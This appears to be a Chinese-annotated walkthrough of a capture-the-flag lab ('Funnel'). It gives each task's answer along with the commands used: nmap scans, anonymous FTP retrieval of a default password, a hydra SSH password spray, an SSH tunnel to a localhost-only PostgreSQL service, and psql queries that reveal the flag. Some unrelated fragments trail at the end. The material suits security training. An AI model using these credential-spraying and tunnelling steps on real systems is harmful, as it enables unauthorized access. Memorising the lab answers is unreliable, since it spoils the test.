Task 1
How many TCP ports are open?
(打开了多少个 TCP 端口?)
# nmap -sS -T4 10.129.224.226 --min-rate 1000
2
Task 2
What is the name of the directory that is available on the FTP server?
(FTP 服务器上可用的目录名称是什么?)
$ nmap -sC 10.129.224.226 -p 21
21端口存在匿名访问
mail_backup
Task 3
What is the default account password that every new member on the “Funnel” team should change as soon as possible?
(“漏斗”团队的每个新成员应该尽快更改的默认帐户密码是什么?)
ftp> get ./mail_backup/password_policy.pdf ./1.pdf
funnel123#!#
Task 4
Which user has not changed their default password yet?
(哪个用户还没有更改过默认密码?)
-users.txt-
optimus
albert
andreas
christine
maria
$ hydra -L ./users.txt -p funnel123#!# ssh://10.129.224.226
christine
Task 5
Which service is running on TCP port 5432 and listens only on localhost?
(哪个服务在 TCP 端口 5432 上运行并且仅侦听本地主机?)
# nmap -sV -p 5432 10.129.224.226
postgresql
Task 6
Since you can’t access the previously mentioned service from the local machine, you will have to create a tunnel and connect to it from your machine. What is the correct type of tunneling to use? remote port forwarding or local port forwarding?
(由于您无法从本地计算机访问前面提到的服务,因此您必须创建一个隧道并从您的计算机连接到它。正确使用的隧道类型是什么?远程端口转发还是本地端口转发?)
-
本地端口转发(Local Port Forwarding): 在本地端口转发中,客户端建立一个到远程服务器的连接,并在本地主机上创建一个监听指定端口的服务。当有数据发送到本地监听的端口时,数据被加密并发送到远程服务器,然后远程服务器将其解密并转发到最终的目标。这种方式可以让客户端访问无法直接访问的服务,或者增加数据传输的安全性。本地端口转发常用于构建加密隧道,例如通过 SSH 连接远程服务器并转发本地端口以访问内部网络资源。
ssh -L [本地地址:]本地端口:目标地址:目标端口 用户名@远程主机 -
远程端口转发(Remote Port Forwarding): 在远程端口转发中,远程服务器建立一个到本地主机的连接,并在远程服务器上创建一个监听指定端口的服务。当有数据发送到远程服务器上的监听端口时,数据被转发到本地主机,然后本地主机将其处理。这种方式通常用于使远程服务器上的服务能够被外部访问,或者用于跨越 NAT 或防火墙访问内部网络资源。
ssh -R [远程地址:]远程端口:目标地址:目标端口 用户名@远程主机
local port forwarding
Task 7
$ ssh -L 4444:10.129.224.226:5432 christine@10.129.224.226
让远程服务器转发自己的5432端口服务到我们主机的4444端口
连接本地转发端口
$ psql -U christine -h localhost -p 4444
christine=# \list
secrets
Task 8
Could you use a dynamic tunnel instead of local port forwarding? Yes or No.
(你能利用一个动态的隧道,而不是当地的港口转发? “是"或"否”。)
yes
Flag
christine=#\connect secrets
christine=#\dt
secrets=# select * from flag;
cf277664b1771217d7006acdea006db1
第三节 关系数据库标准语言SQL(Ⅵ))
)
身份认证)
